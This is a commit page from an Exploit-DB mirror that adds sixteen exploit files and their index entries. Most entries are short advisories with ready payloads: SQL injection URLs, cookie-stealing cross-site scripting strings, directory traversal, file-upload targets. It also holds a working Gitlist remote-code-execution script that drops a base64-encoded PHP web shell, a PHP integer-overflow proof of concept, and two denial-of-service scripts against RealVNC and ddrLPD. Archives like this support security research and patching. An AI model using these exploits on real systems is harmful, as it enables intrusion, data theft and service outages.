bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_01_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-01 04:39:53 +00:00
parent 83e7971bfa
commit 48fef00530
17 changed files with 335 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
files.csv
View file

@ -30543,3 +30543,19 @@ id,file,description,date,author,platform,type,port
33907,platforms/multiple/remote/33907.txt,"ZKSoftware 'ZK5000' Remote Information Disclosure Vulnerability",2010-03-20,fb1h2s,multiple,remote,0
33908,platforms/php/webapps/33908.txt,"Your Articles Directory Login Option SQL Injection Vulnerability",2010-04-29,Sid3^effects,php,webapps,0
33909,platforms/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 'username' Parameter SQL Injection Vulnerability",2010-04-28,"John Leitch",php,webapps,0
33913,platforms/php/webapps/33913.html,"osCommerce 3.0a5 Local File Include and HTML Injection Vulnerabilities",2010-04-30,"Jordi Chancel",php,webapps,0
33914,platforms/php/webapps/33914.txt,"4xcms 'login.php' Multiple SQL Injection Vulnerabilities",2010-03-21,"cr4wl3r ",php,webapps,0
33915,platforms/php/webapps/33915.txt,"Campsite 3.x 'article_id' Parameter SQL Injection Vulnerability",2010-04-30,"Stefan Esser",php,webapps,0
33916,platforms/cfm/webapps/33916.txt,"Mango Blog 1.4.1 'archives.cfm/search' Cross Site Scripting Vulnerability",2010-05-03,MustLive,cfm,webapps,0
33917,platforms/php/webapps/33917.txt,"Billwerx RC5.2.2 PL2 'primary_number' Parameter SQL Injection Vulnerability",2010-05-02,indoushka,php,webapps,0
33918,platforms/php/webapps/33918.txt,"CF Image Hosting Script 1.1 'upload.php' Arbitrary File Upload Vulnerability",2010-05-01,The.Morpheus,php,webapps,0
33919,platforms/php/webapps/33919.txt,"NolaPro Enterprise 4.0.5538 Cross Site Scripting and SQL Injection Vulnerabilities",2010-05-01,ekse,php,webapps,0
33920,platforms/php/remote/33920.php,"PHP 5.3 'php_dechunk()' HTTP Chunked Encoding Integer Overflow Vulnerability",2010-05-02,"Stefan Esser",php,remote,0
33921,platforms/php/webapps/33921.txt,"IslamSound Multiple Remote SQL Injection Vulnerabilities",2010-05-03,JIKO,php,webapps,0
33922,platforms/php/webapps/33922.txt,"CH-CMS.ch 2 Multiple Arbitrary File Upload Vulnerabilities",2010-03-15,EL-KAHINA,php,webapps,0
33923,platforms/asp/webapps/33923.txt,"SamaGraph CMS 'inside.aspx' SQL Injection Vulnerability",2010-03-11,K053,asp,webapps,0
33924,platforms/windows/dos/33924.py,"RealVNC 4.1.3 'ClientCutText' Message Remote Denial of Service Vulnerability",2010-05-02,"John Leitch",windows,dos,0
33925,platforms/php/webapps/33925.txt,"ecoCMS 18.4.2010 'admin.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0
33926,platforms/windows/dos/33926.py,"ddrLPD 1.0 Remote Denial of Service Vulnerability",2010-04-29,"Bisphemol A",windows,dos,0
33927,platforms/php/webapps/33927.txt,"eZoneScripts Apartment Search Script 'listtest.php' SQL Injection Vulnerability",2010-02-09,JIKO,php,webapps,0
33929,platforms/multiple/remote/33929.py,"Gitlist <= 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0

Can't render this file because it is too large.

7
platforms/asp/webapps/33923.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/39892/info
SamaGraph CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/inside.aspx?g=' or '1'='1'--

9
platforms/cfm/webapps/33916.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39864/info
Mango Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Mango Blog 1.4.2 are vulnerable.
http://www.example.com/archives.cfm/search/?term=%3Cbody%20onload=alert(document.cookie)%3E

45
platforms/multiple/remote/33929.py Executable file
View file

@ -0,0 +1,45 @@
from commands import getoutput
import urllib
import sys
"""
Exploit Title: Gitlist <= 0.4.0 anonymous RCE
Date: 06/20/2014
Author: drone (@dronesec)
Vendor Homepage: http://gitlist.org/
Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz
Version: <= 0.4.0
Fixed in: 0.5.0
Tested on: Debian 7
More information: http://hatriot.github.io/blog/2014/06/29/gitlist-rce/
cve: CVE-2014-4511
"""
if len(sys.argv) <= 1:
print '%s: [url to git repo] {cache path}' % sys.argv[0]
print ' Example: python %s http://localhost/gitlist/my_repo.git' % sys.argv[0]
print ' Example: python %s http://localhost/gitlist/my_repo.git /var/www/git/cache' % sys.argv[0]
sys.exit(1)
url = sys.argv[1]
url = url if url[-1] != '/' else url[:-1]
path = "/var/www/gitlist/cache"
if len(sys.argv) > 2:
path = sys.argv[2]
print '[!] Using cache location %s' % path
# payload <?system($_GET['cmd']);?>
payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="
# sploit; python requests does not like this URL, hence wget is used
mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path)
mpath = url+ urllib.quote(mpath)
out = getoutput("wget %s" % mpath)
if '500' in out:
print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]
else:
print '[-] Failed to drop'
print out

16
platforms/php/remote/33920.php Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/39877/info
PHP is prone to a remote integer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code in the context of the PHP process. Failed exploit attempts will result in a denial-of-service condition.
PHP 5.3.0 through 5.3.2 are vulnerable; other versions may also be affected.
<?php
$x = '0fffffffe
XXX';
file_put_contents("file:///tmp/test.dat",$x);
$y = file_get_contents('php://filter/read=dechunk/resource=file:///tmp/test.dat');
echo "here";
?>

11
platforms/php/webapps/33913.html Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/39820/info
osCommerce is prone to a local file-include vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerability using directory-traversal strings to execute local files within the context of the webserver process.
The attacker may leverage the HTML-injection issue to execute arbitrary HTML and script code in the context of the affected browser. This may let the attacker steal cookie-based authentication credentials or control how the site is rendered to the user.
osCommerce 3.0a5 is affected; other versions may also be vulnerable.
http://www.example.com/admin/includes/applications/services/pages/uninstall.php?module=../../../../../../../../cmd

12
platforms/php/webapps/33914.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/39840/info
4xcms is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
4xcms r26 is vulnerable; other versions may also be affected.
The following example data is available:
User: ' or '1=1
Pass: ' or '1=1

9
platforms/php/webapps/33915.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39862/info
Campsite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Campsite versions 3.2 through 3.3.5 are vulnerable; other versions may also be affected.
http://www.example.com/javascript/tinymce/plugins/campsiteattachment/attachments.php?article_id=0+UNION+SELECT+Id,2,concat%28UName,0x2e,Password%29,4,5,6,7,8,9,10,11,12+FROM+liveuser_users+--+x

11
platforms/php/webapps/33917.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/39867/info
Billwerx is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Billwerx RC5.2.2 PL2 is vulnerable; other versions may also be affected.
The following example URI is available:
http://www.example.com/billwerx_rc522_pl2/request_account.php?campaign_id=1&group_id=6&interest_id=6&first_name=indoushka&last_name=indoushka&company_name=indoushka&home_number=indoushka&get_primary=indoushka&work_number=indoushka&mobile_number=indoushka&email_address=indoushka&comments=indoushka&request=REQUEST&close=CLOSE&primary_number=' [(SQL)]

9
platforms/php/webapps/33918.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39870/info
CF Image Hosting Script is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
CF Image Hosting Script 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/upload.php

15
platforms/php/webapps/33919.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/39875/info
NolaPro Enterprise is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
NolaPro Enterprise 4.0.5538 is vulnerable; other versions may also be affected.
http/www.example.com/sidemenu.php?index=1&menutitle=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110,100,32,98,121,32,67,111,114,101,108,97,11
0,32,84,101,97,109%29%29;%3C/script%3E&menutitleorig=STR_ORDERS
http://www.example.om/nporderitemremote.php?pos_mode=1&currency=USD&curdate=2010-04-12&linenum=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110
,100,32,98,121,32,67,111,114,101,108,97,110,32,84,101,97,109%29%29;%3C/script%3E&inventorylocationid=1&customerid=&shiptoid=0
1 or BENCHMARK(2500000,MD5(1))

9
platforms/php/webapps/33921.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39880/info
IslamSound is prone to multiple remote SQL injection vulnerabilities.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/sound.php?catid=2 sql
http://www.example.com/details.php?linkid=-7 union select user(),1,2,database(),version(),5,6,7,8--
http://www.example.com/send.php?linkid=-5 union select user(),1,2,3,4,5,6,7,8--

10
platforms/php/webapps/33922.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/39888/info
CH-CMS.ch is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
CH-CMS.ch 2 is vulnerable; other versions may also be affected.
http://www.example.com/Final/login/ava_up1.php
http://www.example.com/Final/login/ava_up12.php

9
platforms/php/webapps/33925.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39901/info
ecoCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
ecoCMS 18.04.2010 is vulnerable; prior versions may also be affected.
http://www.example.com/admin.php?p=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

7
platforms/php/webapps/33927.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/39905/info
eZoneScripts Apartment Search Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/productdemos/ApartmentSearch/listtest.php?r=-1 union select 0,user()--

74
platforms/windows/dos/33924.py Executable file
View file

@ -0,0 +1,74 @@
source: http://www.securityfocus.com/bid/39895/info
RealVNC Viewer is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
RealVNC 4.1.3 is vulnerable; other versions may also be affected.
import sys, struct, socket
host ='localhost'
port = 5900
def crash_vnc_server():
try:
while 1:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(1.0)
print 'Connected'
try:
b = s.recv(8192)
print 'ProtocolVersion Received'
s.send(b)
print 'ProtocolVersion Sent'
b = s.recv(8192)
print 'Security Received'
s.send('\x01')
print 'Security Sent'
# Recv SecurityResult
b = s.recv(8192)
print 'SecurityResult Received'
if (len(b) == 4 and
b[0] == chr(0) and
b[1] == chr(0) and
b[2] == chr(0) and
b[3] == chr(0)):
print 'SecurityResult OK'
else:
print 'SecurityResult Failed.\n\nThe server must be set '\
'to No Authentication for this to work, otherwise '\
'you \'ll need to write the necessary client side '\
'authentication code yourself.'
return
s.send('\x01')
print 'ClientInit Sent'
b = s.recv(8192)
print 'ServerInit Received'
text_len = 0xFFFFFF
text_str = struct.pack('L', text_len) + '\xAA' * text_len
while 1:
s.send('\x06\x00\x00\x00' + text_str)
print 'ClientCutText Sent'
except Exception:
print 'Connection closed'
except Exception:
print 'Couldn\'t connect'
crash_vnc_server()

66
platforms/windows/dos/33926.py Executable file
View file

@ -0,0 +1,66 @@
source: http://www.securityfocus.com/bid/39904/info
ddrLPD is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
ddrLPD 1.0 is vulnerable; other versions may also be affected.
#==================================================================================================#
# #
# $$$$$$$\ $$\ $$\ $$\ $$$$$$\ #
# $$ __$$\ \__| $$ | $$ | $$ __$$\ #
# $$ | $$ |$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$ | $$ / $$ | #
# $$$$$$$\ |$$ |$$ _____|$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ | $$$$$$$$ | #
# $$ __$$\ $$ |\$$$$$$\ $$ / $$ |$$ | $$ |$$$$$$$$ |$$ | $$ |$$ / $$ |$$ | $$ __$$ | #
# $$ | $$ |$$ | \____$$\ $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ |$$ | $$ | $$ | #
# $$$$$$$ |$$ |$$$$$$$ |$$$$$$$ |$$ | $$ |\$$$$$$$\ $$ | $$ |\$$$$$$ |$$ | $$ | $$ | #
# \_______/ \__|\_______/ $$ ____/ \__| \__| \_______|\__| \__| \______/ \__| \__| \__| #
# $$ | #
# $$ | Plastics Make It Possible #
# \__| #
# #
#==================================================================================================#
# #
# Vulnerability............Denial-of-Service #
# Software.................ddrLPD 1.0 #
# Download.................http://ddr.web.id/files/ddrLPDsetup.exe #
# Date.....................4/29/10 #
# #
#==================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#==================================================================================================#
# #
# ##Description## #
# #
# Sending packets composed of bytes between 1 and 5 (inclusive) causes the the server to crash. #
# #
# ddrlpd.exe: The instruction at 0x50431A referenced memory at 0x0. The memory could not be read #
# (0x0050431A -> 00000000) #
# #
# ##Proof of Concept## #
import socket
host ='localhost'
try:
while 1:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 515))
s.settimeout(1.0)
print 'connected',
try:
while 1:
s.send('\x01'*8192)
print '.',
except Exception:
print '\nconnection closed'
pass
except Exception:
print 'couldn\'t connect'